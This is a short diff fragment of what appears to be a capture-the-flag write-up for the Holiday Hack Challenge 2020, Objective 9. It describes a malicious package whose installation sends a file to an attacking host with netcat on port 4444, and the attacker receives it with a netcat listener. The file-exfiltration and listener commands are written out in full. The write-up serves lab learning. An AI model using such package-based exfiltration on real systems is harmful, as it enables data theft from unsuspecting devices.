joergschwarzwaelder/hhc2020/Objective-9/README.md

     /bin/nc 10.6.0.2 4444 < /NORTH_POLE_Land_Use_Board_Meeting_Minutes.txt

-That way the remoter device would download this package and install it.
-In course of t
+That way the remote device would download this package and install it.
+In course of the installation, the file in scope would be sent to port 4444 of the attacking host, which has to run the command

+    nc -lvp 4444 > text
+to receive the text.
 <!--stackedit_data:
-eyJoaXN0b3J5IjpbMjY5MDI1NjE4LC04NzgzOTIyMTYsNTE0Mj
-A5MTU5XX0=
+eyJoaXN0b3J5IjpbLTUyNDU2NDY5OSwtODc4MzkyMjE2LDUxND
+IwOTE1OV19
 -->